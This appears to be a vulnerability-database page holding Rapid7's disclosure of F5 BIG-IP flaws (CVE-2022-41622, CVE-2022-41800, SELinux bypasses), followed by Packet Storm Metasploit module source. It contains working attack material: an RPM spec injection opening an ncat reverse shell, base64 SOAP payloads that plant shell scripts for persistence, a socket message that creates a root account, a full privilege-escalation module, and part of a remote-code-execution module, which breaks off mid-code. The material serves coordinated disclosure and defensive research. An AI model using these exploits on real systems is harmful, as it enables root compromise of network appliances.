DATABASE RESOURCES PRICING ABOUT US

{"id": "RAPID7BLOG:2EA2AEC7121196EE114119D8826C749D", "vendorId": null, "type": "rapid7blog", "bulletinFamily": "info", "title": "CVE-2022-41622 and CVE-2022-41800 (FIXED): F5 BIG-IP and iControl REST Vulnerabilities and Exposures", "description": "\n\nRapid7 discovered several vulnerabilities and exposures in F5 BIG-IP and BIG-IQ devices running a customized distribution of CentOS detailed in F5's [Base Operating Systems](<https://support.f5.com/csp/article/K121>) support article. The affected products are detailed in the vendor advisories below:\n\n * [CVE-2022-41622](<https://support.f5.com/csp/article/K94221585>): BIG-IP and BIG-IQ are vulnerable to unauthenticated remote code execution via cross-site request forgery (CSRF)\n * [CVE-2022-41800](<https://support.f5.com/csp/article/K13325942>): Appliance mode iControl REST is vulnerable to authenticated remote code execution via RPM spec injection\n\nRapid7 also discovered several bypasses of security controls that F5 does not consider vulnerabilities with a reasonable attack surface ([K05403841](<https://support.f5.com/csp/article/K05403841>)):\n\n * ID1145045 - Local privilege escalation via bad UNIX socket permissions ([CWE-269](<https://cwe.mitre.org/data/definitions/269.html>))\n * ID1144093 - SELinux bypass via incorrect file context ([CWE-732](<https://cwe.mitre.org/data/definitions/732.html>))\n * ID1144057 - SELinux bypass via command injection in an update script ([CWE-78](<https://cwe.mitre.org/data/definitions/78.html>))\n\nNote: the presence of SELinux hardening on F5 devices is an excellent safeguard that made our exploitation attempts more difficult.\n\nRapid7 initially reported these vulnerabilities to F5 on August 18, 2022. Since then, members of our research team have worked with the vendor to discuss impact, resolution, and a coordinated response.\n\n## Product description\n\nSeveral F5 products, namely in the BIG-IP family of traffic-shaping devices, are affected by the vulnerabilities. These devices and applications are typically exposed to the internet for normal functionality, but the management ports where these vulnerabilities occur are typically internal-facing.\n\nFor more information on the affected products, see the vendor's [advisory](<https://support.f5.com/csp/article/K97843387>), and the vendor's [product website](<https://www.f5.com/products>).\n\n## Impact\n\nWe believe that widespread exploitation of the issues in this disclosure is unlikely. That being said, by successfully exploiting the worst of the vulnerabilities (CVE-2022-41622), an attacker could gain persistent root access to the device's management interface (even if the management interface is not internet-facing). However, that would require a confluence of factors to actually be exploitable (an administrator with an active session would need to visit a hostile website, and an attacker would have to have some knowledge of the target network).\n\nMost of the remaining vulnerabilities are relatively minor, and require the attacker to already have some level of access to the target device. They are more likely to be leveraged as part of an exploit chain to exacerbate more serious vulnerabilities.\n\nAt time of publishing, F5 was not aware of any exploitation of these vulnerabilities.\n\n## Credit\n\nThese vulnerabilities were discovered and documented by Ron Bowes, Lead Security Researcher at Rapid7. They are being disclosed in accordance with Rapid7\u2019s [vulnerability disclosure policy](<https://www.rapid7.com/disclosure/>).\n\n## Vendor statement\n\nF5 is committed to security, and we collaborate with valued researchers, such as Rapid7, to respond to and resolve vulnerabilities on behalf of our customers.\n\n## Exploitation\n\n### CVE-2022-41622 - Unauthenticated Remote Code Execution in SOAP API via CSRF\n\nF5 Big-IP's SOAP API (the endpoint `/iControl/iControlPortal.cgi`) does not have cross-site request forgery (CSRF) protection, nor does it require a correct `Content-Type` or other typical SOAP API protections. Consequently, if a user (who is authenticated to an F5 Big-IP device) visits an attacker-controlled website (or is redirected there via an open redirect or cross-site scripting), an attacker can run arbitrary SOAP commands against the F5 Big-IP SOAP API in the authenticated user's session. That could lead to remote code execution in several different ways, which we demonstrated in a [proof of concept](<https://github.com/rbowes-r7/refreshing-soap-exploit>). \n\nNote: several of the exploit paths require SELinux bypasses, which we have detailed below.\n\nThe API endpoint for SOAP requests, `iControlPortal.cgi`, which is accessible at `/iControl/iControlPortal.cgi`, is a CGI script that is SetUID root \u2014 that is, it executes as root:\n \n \n ls -l /usr/local/www/iControl/iControlPortal.cgi\n -rwsr-xr-x. 1 root root 2931172 Jul 15 01:13 /usr/local/www/iControl/iControlPortal.cgi\n \n\nThe script authenticates the user via HTTP Basic authentication and accepts XML SOAP requests. The XML API is quite complex with many different API endpoints available to use. We chose the `upload_file` and `create_user_3` endpoints as examples in our PoC, because they demonstrate the impact of the exploit concisely. We didn't find a way to immediately run code on the target host, but our investigation did not include every possible API endpoint.\n\n[The PoC README.md file](<https://github.com/rbowes-r7/refreshing-soap-exploit/blob/main/README.md>) has full details on the payloads we tested and how to use them to execute arbitrary code at reboot or login.\n\n### CVE-2022-41800 - Authenticated Remote Code Execution via RPM Spec Injection\n\nF5 Big-IP's JSON API includes an administrator-only endpoint that creates an RPM specification file (`.rpmspec`). That file is consumed by another administrator-only endpoint to create an RPM file. Both endpoints are vulnerable to injection attacks into the RPM spec file, where additional fields could be added to the spec using newlines. Notably, an attacker could add executable shell commands that run when the resultant RPM file is created. This would give authenticated administrators (who may be malicious insiders, users of compromised accounts, etc) the ability to run shell commands using an endpoint that is not designed or documented as having that functionality.\n\nAlthough F5 considered this noteworthy enough to assign CVE-2022-41800, we consider the risk of this vulnerability to be low. While the results are surprising, this exploit requires an administrator login, and other endpoints (such as `/mgmt/tm/util/bash`) that are capable of executing shell commands by-design. That said, this technique can bypass blocklists or alerts that an administrator might set up for the well known `bash` endpoint.\n\nTo demonstrate the vulnerability, we developed this JSON payload:\n \n \n json\n {\n \"specFileData\": {\n \"name\": \"test\",\n \"srcBasePath\": \"/tmp\",\n \"version\": \"test6\",\n \"release\": \"test7\",\n \"description\": \"test8\\n\\n%check\\nncat -e /bin/bash 10.0.0.179 4444\",\n \"summary\": \"test9\"\n }\n }\n \n\nNote the newlines and `%check` in the `description` field, which according to [the documentation](<https://rpm-software-management.github.io/rpm/manual/spec.html>) is typically used to run tests. We sent that JSON as part of an authenticated request to `/rpm-spec-creator`:\n \n \n $ curl -sk -uadmin:Password1 -H \"Content-Type: application/json\" -X POST https://10.0.0.162/mgmt/shared/iapp/rpm-spec-creator --data '{\"specFileData\": {\"name\": \"test\", \"srcBasePath\": \"/tmp\", \"version\": \"test6\", \"release\": \"test7\", \"description\": \"test8\\n\\n%check\\nncat -e /bin/bash 10.0.0.179 4444\", \"summary\": \"test9\"}}'\n {\"specFileData\":{\"name\":\"test\",\"srcBasePath\":\"/tmp\",\"version\":\"test6\",\"release\":\"test7\",\"description\":\"test8\\n\\n%check\\nncat -e /bin/bash 10.0.0.179 4444\",\"summary\":\"test9\",\"user\":\"restnoded\",\"group\":\"restnoded\"},\"specFilePath\":\"/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec\"}\n \n\nThe server responds with a `specFilePath` containing the spec we created. Here's what the file looks like on the file system:\n \n \n $ ssh root@10.0.0.162 cat /var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec\n Summary: test9\n Name: test\n Version: test6\n Release: test7\n BuildArch: noarch\n Group: Development/Libraries\n License: Commercial Packager: \n F5 Networks <support@f5.com>\n \n %description\n test8\n \n %check\n n.cat -e /bin/bash 10.0.0.179 4444\n \n [...]\n \n\nWe start our listener on the host/port specified in the `ncat` command:\n \n \n $ nc -v -l -p 4444\n Ncat: Version 7.93 ( https://nmap.org/ncat )\n Ncat: Listening on :::4444\n Ncat: Listening on 0.0.0.0:4444\n \n\nAnd build the RPM with `/build-package` (using `jq` to format the output):\n \n \n sh\n $ curl -X POST -sku admin:Password1 https://10.0.0.162/mgmt/shared/iapp/build-package --data '{\"state\": {}, \"appName\": \n \"test\", \"packageDirectory\": \"/tmp\", \"specFile\n Path\": \"/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec\", \"force\": true }' | jq\n \n {\n \"step\": \"RUN_BUILD_RPM_TASK\",\n \"packageDirectory\": \"/tmp\",\n \"appName\": \"test\",\n \"specFilePath\": \"/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec\",\n \"force\": true,\n \"rpmDescription\": \"Default exported iApp description.\",\n \"rpmSummary\": \"Default exported iApp summary.\",\n \"isSpecFileToCleanUp\": false,\n \"id\": \"5de02c7f-ac65-4fa0-8c2b-b541967ce578\",\n \"status\": \"CREATED\",\n \"userReference\": {\n \"link\": \"https://localhost/mgmt/shared/authz/users/admin\"\n },\n \"identityReferences\": [\n {\n \"link\": \"https://localhost/mgmt/shared/authz/users/admin\"\n }\n ],\n \"ownerMachineId\": \"97163127-c56e-456c-af33-752dec349873\",\n \"generation\": 1,\n \"lastUpdateMicros\": 1666214391730921,\n \"kind\": \"shared:iapp:build-package:buildrpmtaskstate\",\n \"selfLink\": \"https://localhost/mgmt/shared/iapp/build-package/5de02c7f-ac65-4fa0-8c2b-b541967ce578\"\n }\n \n\nThen, we verify that we get a root in shell on our listener:\n \n \n $ nc -v -l -p 4444\n Ncat: Version 7.93 ( https://nmap.org/ncat )\n Ncat: Listening on :::4444\n Ncat: Listening on 0.0.0.0:4444\n Ncat: Connection from 10.0.0.162.\n Ncat: Connection from 10.0.0.162:58068.\n \n whoami\n root\n \n\n### ID1145045 - Local Privilege Escalation via UNIX Socket Permissions\n\nF5 uses a proprietary database called `mcp`, which is used for persistent storage on Big-IP (and related) devices. The database is owned by root and accessed via a UNIX domain socket with 0777 permissions (accessible by all local users) and no authentication:\n \n \n # ls -l /var/run/mcp \n srwxrwxrwx. 1 root root 0 Oct 19 14:12 /var/run/mcp\n \n\nWe can connect to it and perform queries using `socat`, which is (helpfully) installed by default.\n\nAs part of our research, we fully documented the protocol, including [writing a tool](<https://github.com/rbowes-r7/refreshing-mcp-tool>) that can parse queries, create arbitrary queries, and remotely eavesdrop on traffic via an authenticated SSH connection. While the [list of supported object types](<https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-objects.txt>) is extensive, we targeted the user-management code since our goal was security bypasses.\n\nWe developed a script called `mcp-privesc.rb`, which is also included in that repository. The script creates a root-level account when its output is sent to that socket, as well as a pre-built `escalationplz.bin` payload that creates a `rontest` / `Password1` account when sent to the socket.\n\nHere's how we used the tool to create a message. Note: it was gzipped it for size reasons, then base64-encoded so we could copy/paste more easily. Output is truncated for the blog, but the full text is included in the `README.md` file in the repository:\n \n \n $ ruby ./mcp-privesc.rb blogtest MyFunPW | gzip | base64 -w0\n Attempting to create a crypt-sha512 hash of the password\n Writing an `mcp` message to stdout that'll create an account: blogtest / $6$vdznqfyc$q9L[...]1\n Send it to the target using: socat -t100 - UNIX-CONNECT:/var/run/mcp < mcpmessage.bin\n \n H4s[...]A==\n \n\nThen, from a non-root account, we send the message to the socket and verify the account exists:\n \n \n $ whoami\n apache\n \n $ echo -ne 'H4s[...]A==' | base64 -d | gunzip - | socat -t100 - UNIX-CONNECT:/var/run/mcp | gzip | base64 -w0\n H4sIAB91UGMAA2NgYJBjQALcIQy8QEqMO5SBFcwPZ+AR0OCOAJKaYAUEVXNHgVRzCzIwAABM8W1YXAAAAA==\n \n bash-4.2$ su blogtest\n Password: \n [...]\n \n [blogtest@localhost:NO LICENSE:Standalone] config # whoami\n root\n \n\nF5 claims this is not a vulnerability, because, by design, all users that log in are already root (and it's true that the overwhelming amount of Big-IP's attack surface runs as root already). However, several network services\u2014including Apache, Tomcat, and Bind\u2014listen on network ports and link to custom modules written in C/C++. If a vulnerability is discovered in any of those non-root services, a privilege escalation exploit path directly to root removes the small amount of privilege separation that exists.\n\n### ID1144093 - SELinux Bypass via Incorrect File Context\n\nAfter finding an arbitrary file write SOAP endpoint, we found that SELinux limited our ability to actually exploit the issue. Despite the SOAP endpoint (`iControlPortal.cgi`) being set-UID root, and therefore executing as a privileged process, it could not create or overwrite sensitive files due to being part of a restricted SELinux context. That means that we couldn't use obvious attack paths like adding a script to `/etc/profile.d` or replacing `/var/ssh/root/authorized_keys`.\n\nWe did, however, find exactly one file in `/etc/profile.d` that was writable from the SOAP process due to it being a symbolic link to another location:\n \n \n # ls -l /etc/profile.d/timeout.sh\n lrwxrwxrwx. 1 root root 31 Jul 15 02:48 /etc/profile.d/timeout.sh -> ../../var/run/config/timeout.sh\n \n # ls -l /var/run/config/timeout.sh \n -r--r--r--. 1 root root 303 Oct 19 15:40 /var/run/config/timeout.sh\n \n\nIf we replace `/var/run/config/timeout.sh` with our own script via the SOAP interface, which we can (despite the file itself not having write permission), it will execute next time a user logs in via SSH and `/etc/profile.d` scripts execute. We use that file as a target in our [SOAP exploit proof of concept](<https://github.com/rbowes-r7/refreshing-soap-exploit>):\n \n \n <soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:con=\"urn:iControl:System/ConfigSync\">\n <soapenv:Header/>\n <soapenv:Body>\n <con:upload_file soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <file_name xsi:type=\"xsd:string\">/var/run/config/timeout.sh</file_name>\n <file_context xsi:type=\"urn:System.ConfigSync.FileTransferContext\" xmlns:urn=\"urn:iControl\">\n <!--type: Common.OctetSequence-->\n <file_data xsi:type=\"urn:Common.OctetSequence\">IyBSZXN0b3JlIHRoZSBvcmlnaW5hbCBmaWxlCmVjaG8gJ0l3b2pJRlJJU1ZNZ1NWTWdRVTRnUVZWVVR5MUhSVTVGVWtGVVJVUWdSa2xNUlNBdElFUlBJRTVQVkNCRlJFbFVJU0VoQ2lNS0l5QlZjMlVnZEdobElIUnRjMmdnYzJobGJHd2dkWFJwYkdsMGVTQjBieUJ0WVd0bElHTm9ZVzVuWlhNZ2RHOGdkR2hsSUhONWMzUmxiU0JqYjI1bWFXZDFjbUYwYVc5dUxnb2pJRVp2Y2lCdGIzSmxJR2x1Wm05eWJXRjBhVzl1TENCelpXVWdkRzF6YUNBdFlTQm9aV3h3SUhONWN5QnpjMmhrTGdwUVUwOVZWRDFnTDJKcGJpOXdjeUF0TFc1dkxXaGxZV1JsY25NZ0xXOGdkSFI1SUMwa0pHQUthV1lnV3lBaUpIdFFVMDlWVkRvd09qTjlJaUE5UFNBaWRIUjVJaUJkT3lCMGFHVnVDaUFnSUNCbGVIQnZjblFnVkUxUFZWUTlNQXBsYkhObENpQWdJQ0JsZUhCdmNuUWdWRTFQVlZROU1BcG1hUW9LJyB8IGJhc2U2NCAtZCA+IC92YXIvcnVuL2NvbmZpZy90aW1lb3V0LnNoCgojIFBvcCBhIHNoZWxsCm5jYXQgLWUgL2Jpbi9iYXNoIDEwLjAuMC4xNzkgNDQ0NAo=</file_data>\n <chain_type xsi:type=\"urn:Common.FileChainType\">FILE_FIRST_AND_LAST</chain_type>\n </file_context>\n </con:upload_file>\n </soapenv:Body>\n </soapenv:Envelope>\n \n\nF5 argues that this is not a vulnerability, because it requires a different vulnerability to exist before it can be leveraged (as we demonstrated with CVE-2022-41622 above). As a result, it was not assigned a CVE. However, Rapid7 considers this a vulnerability because it bypasses a security boundary \u2014namely, SELinux. Without these SELinux bypasses, turning an arbitrary file write into code execution would be difficult, since most files an attacker would typically create or replace to exploit a file-write vulnerability (such as adding a script to `/etc/profile.d`) are blocked.\n\n### ID1144057 - SELinux bypass via Command Injection in Startup Script\n\nThe script `/bin/f5_update_checker`, which is executed at boot, is vulnerable to command injection in its configuration file (`/shared/f5_update_action`). Several strings in the file are passed directly into shell commands, where arbitrary bash commands can be injected using backticks, semicolons, or any other typical [CWE-78](<https://cwe.mitre.org/data/definitions/78.html>) technique.\n\nThis one is interesting, because we found it quite early in our research but didn\u2019t recognize its significance until much later. During our initial analysis, `f5_update_checker` caught our eye because it runs at boot, performs some sort of nebulous update check (ironically, update mechanisms are [a common source](<https://ieeexplore.ieee.org/document/6769681>) of security vulnerabilities), and is a 32-bit ELF binary written in C++. Additionally, running `strings` showed that it uses `curl` insecurely, with `-k`:\n \n \n # strings $(which f5_update_checker)\n [...]\n curl -g -k -m 30 -s -f -o /dev/null \n \n\nWhen `f5_update_checker` starts, it loads and parses a configuration file called `/shared/f5_update_action`, which doesn't exist by default. In fact, as far as we can tell, absolutely nothing else on the entire operating system is aware of `/shared/f5_update_action`! Out of curiosity, we reverse engineered the file format from the binary, since the process won't start without a valid (enough) file, and found it's line-based and looks something like:\n \n \n AAA\n http://localhost:1234/success\n http://localhost:1234/failure\n 0\n 0\n 0\n 0\n \n\nThe URLs are passed directly into `curl` with no escaping (not even quotes, in fact), so we can add in arbitrary commands however we like:\n \n \n AAA\n http://localhost:1234/success`touch /tmp/testshellinjection`\n http://localhost:1234/failure\n 0\n 0\n 0\n 0\n \n\nAt the next reboot, `f5_update_checker` will execute, load the configuration file, pause for two minutes (by design), then execute the command.\n\nAt that point, we shelved this as not interesting with the note:\n\n`f5_update_checker` consumes a file `/shared/f5_update_action` and grabs a URL from it. That leads to a bunch of problems - shell injection, SSRF, etc. But nothing seems to use any of this, so I guess it's all a dud\n\nMuch later, we found the SOAP bypass discussed above, but lamented that while we could upload a file to anywhere on the filesystem as root, we couldn't overwrite anything of value due to SELinux policies! After thinking for way too long, we remembered the seemingly innocuous vulnerability that we'd found a month earlier, recalled that it references a non-extant file, and tested it with SOAP. Sure enough, it worked!\n\nHere is an example of a SOAP request that will plant a malicious `/shared/f5_update_action` file:\n \n \n <soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:con=\"urn:iControl:System/ConfigSync\">\n <soapenv:Header/>\n <soapenv:Body>\n <con:upload_file soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <file_name xsi:type=\"xsd:string\">/shared/f5_update_action</file_name>\n <file_context xsi:type=\"urn:System.ConfigSync.FileTransferContext\" xmlns:urn=\"urn:iControl\">\n <!--type: Common.OctetSequence-->\n <file_data xsi:type=\"urn:Common.OctetSequence\">QUFBCmh0dHBzOi8vbG9jYWxob3N0L3N1Y2Nlc3NgbmNhdCAtZSAvYmluL2Jhc2ggMTAuMC4wLjE3OSA0NDQ0YApodHRwczovL2xvY2FsaG9zdC9lcnJvcgowCjAKMAowCg==</file_data>\n <chain_type xsi:type=\"urn:Common.FileChainType\">FILE_FIRST_AND_LAST</chain_type>\n </file_context>\n </con:upload_file>\n </soapenv:Body>\n </soapenv:Envelope>\n \n\nThis is an interesting case in which a low-risk vulnerability can actually be meaningfully leveraged, in the right context. Specifically, we found a way to bypass SELinux and create some sneaky persistence.\n\nAs with some of the other issues documented here, F5 does not consider this to be a vulnerability and did not assign it a CVE (but do plan to fix it). Rapid7 disagrees with their assessment because SELinux is a security boundary, and bypassing SELinux is a security issue. We'd normally consider this to be a very low-risk vulnerability, but because we used it as part of the exploit chain to turn CVE-2022-41622 into code execution, we believe it is important.\n\n## Remediation\n\nF5 has provided the following remediation advice:\n\nF5 recommends customers review the security advisories published for these issues and evaluate their risk. Engineering hotfixes are available on request for both CVEs, and fixes for all of the issues will be included in future releases.\n\nThe known exploitation methods for CVE-2022-41622 require the attacker to know the address for a particular BIG-IP and successfully enact a Cross-Site Request Forgery against an administrator who is using the same browser to browse the web as well as manage their BIG-IP. Normal anti-CSRF techniques will prevent this exploit from succeeding; see [K94221585](<https://support.f5.com/csp/article/K94221585>) for more details.\n\nThe known exploitation methods for CVE-2022-41800 require that an attacker be authenticated as a valid user with Resource Admin or greater privileges. Therefore, the impact is limited to those customers running with Appliance Mode enabled; see [K12815](<https://support.f5.com/csp/article/K12815>) for more information on Appliance Mode.\n\n## Timeline\n\n * July, 2022: Issues identified by Rapid7 researcher [Ron Bowes](<https://infosec.exchange/web/@iagox86>)\n * Thu, Aug 18, 2022: Privately disclosed findings to [F5 PSIRT](<https://support.f5.com/csp/article/K4602>) per [Rapid7's CVD policy](<https://www.rapid7.com/security/disclosure/#zeroday>)\n * Aug-Sep, 2022: Discussion and clarification about the issues with F5\n * Thu, Sep 8, 2022: Extension on vulnerability disclosure date requested, offered Nov 17, 2022\n * Fri, Sep 30, 2022: [CVE-2022-41622](<https://www.cve.org/CVERecord?id=CVE-2022-41622>) and [CVE-2022-41800](<https://www.cve.org/CVERecord?id=CVE-2022-41800>) reserved by F5\n * Wed, Oct 5, 2022: Disclosure date moved to Wed, Nov 16, 2022\n * Wed, Nov 16, 2022: This public disclosure\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers will be able to assess their exposure to CVE-2022-41622 and CVE-2022-41800 with authenticated vulnerability checks for BIG-IP, expected to be available in the November 16, 2022 content release.", "published": "2022-11-16T15:00:00", "modified": "2022-11-16T15:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://blog.rapid7.com/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/", "reporter": "Ron Bowes", "references": [], "cvelist": ["CVE-2022-41622", "CVE-2022-41800"], "immutableFields": [], "lastseen": "2022-11-16T16:33:31", "viewCount": 61, "enchantments": {"score": {"value": 0.8, "vector": "NONE"}, "epss": [{"cve": "CVE-2022-41622", "epss": "0.674370000", "percentile": "0.973420000", "modified": "2023-03-20"}, {"cve": "CVE-2022-41800", "epss": "0.064300000", "percentile": "0.925530000", "modified": "2023-03-20"}], "vulnersScore": 0.8}, "_state": {"dependencies": 1668616476, "score": 1668618677, "epss": 1679352629}, "_internal": {"score_hash": "47d28842a5f00a3b73675e0c8f84588e"}}

{"packetstorm": [{"lastseen": "2023-02-03T15:17:08", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-02-03T00:00:00", "type": "packetstorm", "title": "F5 Big-IP Create Administrative User", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41622", "CVE-2022-41800"], "modified": "2023-02-03T00:00:00", "id": "PACKETSTORM:170847", "href": "https://packetstormsecurity.com/files/170847/F5-Big-IP-Create-Administrative-User.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'unix_crypt' \n \nclass MetasploitModule < Msf::Exploit::Local \ninclude Msf::Post::Linux::F5Mcp \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'F5 Big-IP Create Admin User', \n'Description' => %q{ \nThis creates a local user with a username/password and root-level \nprivileges. Note that a root-level account is not required to do this, \nwhich makes it a privilege escalation issue. \n \nNote that this is pretty noisy, since it creates a user account and \ncreates log files and such. Additionally, most (if not all) \nvulnerabilities in F5 grant root access anyways. \n \nAdapted from https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-privesc.rb \n}, \n'License' => MSF_LICENSE, \n'Author' => ['Ron Bowes'], \n'Platform' => [ 'unix', 'linux', 'python' ], \n'SessionTypes' => ['shell', 'meterpreter'], \n'References' => [ \n['URL', 'https://github.com/rbowes-r7/refreshing-mcp-tool'], # Original PoC \n['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'], \n['URL', 'https://support.f5.com/csp/article/K97843387'], \n], \n'Privileged' => true, \n'DisclosureDate' => '2022-11-16', \n'Arch' => [ ARCH_CMD, ARCH_PYTHON ], \n'Type' => :unix_cmd, \n'Targets' => [[ 'Auto', {} ]], \n'Notes' => { \n'Stability' => [], \n'Reliability' => [], \n'SideEffects' => [] \n} \n) \n) \n \nregister_options([ \nOptString.new('USERNAME', [true, 'Username to create (default: random)', Rex::Text.rand_text_alphanumeric(8)]), \nOptString.new('PASSWORD', [true, 'Password for the new user (default: random)', Rex::Text.rand_text_alphanumeric(12)]), \n \nOptBool.new('CREATE_SESSION', [true, 'If set, use the new account to create a root session', true]), \n]) \nend \n \ndef exploit \n# Get or generate the username/password \nfail_with(Failure::BadConfig, 'USERNAME cannot be empty') if datastore['USERNAME'].empty? \nusername = datastore['USERNAME'] \n \nif datastore['CREATE_SESSION'] \npassword = Rex::Text.rand_text_alphanumeric(12) \nnew_password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12) \n \nprint_status(\"Will attempt to create user #{username} / #{password}, then change password to #{new_password} when creating a session\") \nelse \npassword = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12) \n \nprint_status(\"Will attempt to create user #{username} / #{password}\") \nend \n \n# If the password is already hashed, leave it as-is \nvprint_status('Hashing the password with SHA512') \nhashed_password = UnixCrypt::SHA512.build(password) \n \nif !hashed_password || hashed_password.empty? \nfail_with(Failure::BadConfig, 'Failed to hash the password with String.crypt') \nend \n \n# These requests have to go in a single 'session', which, to us, is \n# a single packet (since we don't have AF_UNIX sockets) \nresult = mcp_send_recv([ \n# Authenticate as 'admin' (this probably shouldn't work but does) \nmcp_build('user_authenticated', 'structure', [ \nmcp_build('user_authenticated_name', 'string', 'admin') \n]), \n \n# Start transaction \nmcp_build('start_transaction', 'structure', [ \nmcp_build('start_transaction_load_type', 'ulong', 0) \n]), \n \n# Create the role mapping \nmcp_build('create', 'structure', [ \nmcp_build('user_role_partition', 'structure', [ \nmcp_build('user_role_partition_user', 'string', username), \nmcp_build('user_role_partition_role', 'ulong', 0), \nmcp_build('user_role_partition_partition', 'string', '[All]'), \n]) \n]), \n \n# Create the userdb entry \nmcp_build('create', 'structure', [ \nmcp_build('userdb_entry', 'structure', [ \nmcp_build('userdb_entry_name', 'string', username), \nmcp_build('userdb_entry_partition_id', 'string', 'Common'), \nmcp_build('userdb_entry_is_system', 'ulong', 0), \nmcp_build('userdb_entry_shell', 'string', '/bin/bash'), \nmcp_build('userdb_entry_is_crypted', 'ulong', 1), \nmcp_build('userdb_entry_passwd', 'string', hashed_password), \n]) \n]), \n \n# Finish the transaction \nmcp_build('end_transaction', 'structure', []) \n]) \n \n# Handle errors \nif result.nil? \nfail_with(Failure::Unknown, 'Request to mcp appeared to fail') \nend \n \n# The only result we really care about is an error \nerror_returned = false \nresult.each do |r| \nresult = mcp_get_single(r, 'result') \nresult_code = mcp_get_single(result, 'result_code') \n \n# If there's no code or it's zero, just ignore it \nif result_code.nil? || result_code == 0 \nnext \nend \n \n# If we're here, an error was returned! \nerror_returned = true \n \n# Otherwise, try and get result_message \nresult_message = mcp_get_single(result, 'result_message') \nif result_message.nil? \nprint_warning(\"mcp query returned a non-zero result (#{result_code}), but no error message\") \nelse \nprint_error(\"mcp query returned an error message: #{result_message} (code: #{result_code})\") \nend \nend \n \n# Let them know if it likely worked \nif !error_returned \nprint_good(\"Service didn't return an error, so user was likely created!\") \n \nif datastore['CREATE_SESSION'] \nprint_status('Attempting create a root session...') \n \nout = cmd_exec(\"echo -ne \\\"#{password}\\\\n#{password}\\\\n#{new_password}\\\\n#{new_password}\\\\n#{payload.encoded}\\\\n\\\" | su #{username}\") \n \nvprint_status(\"Output from su command: #{out}\") \nend \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/170847/f5_create_user.rb.txt"}, {"lastseen": "2022-11-24T14:27:19", "description": "", "cvss3": {}, "published": "2022-11-24T00:00:00", "type": "packetstorm", "title": "F5 BIG-IP iControl Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41622", "CVE-2022-41800"], "modified": "2022-11-24T00:00:00", "id": "PACKETSTORM:170008", "href": "https://packetstormsecurity.com/files/170008/F5-BIG-IP-iControl-Remote-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'F5 BIG-IP iControl Authenticated RCE via RPM Creator', \n'Description' => %q{ \nThis module exploits a newline injection into an RPM .rpmspec file \nthat permits authenticated users to remotely execute commands. \n \nSuccessful exploitation results in remote code execution \nas the root user. \n}, \n'Author' => [ \n'Ron Bowes' # Discovery, PoC, and module \n], \n'References' => [ \n['CVE', '2022-41800'], \n['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'], \n['URL', 'https://support.f5.com/csp/article/K97843387'], \n['URL', 'https://support.f5.com/csp/article/K13325942'], \n], \n'License' => MSF_LICENSE, \n'DisclosureDate' => '2022-11-16', # Vendor advisory \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD], \n'Privileged' => true, \n'Targets' => [ \n[ 'Default', {} ] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true, \n'PrependFork' => true, # Needed to avoid warnings about timeouts and potential failures across attempts. \n'MeterpreterTryToFork' => true # Needed to avoid warnings about timeouts and potential failures across attempts. \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], # One at a time \n'SideEffects' => [ \nIOC_IN_LOGS, \nARTIFACTS_ON_DISK \n] \n} \n) \n) \n \nregister_options( \n[ \nOptString.new('HttpUsername', [true, 'iControl username', 'admin']), \nOptString.new('HttpPassword', [true, 'iControl password', '']) \n] \n) \nend \n \ndef exploit \n# The RPM name is based on these, so we need these to delete 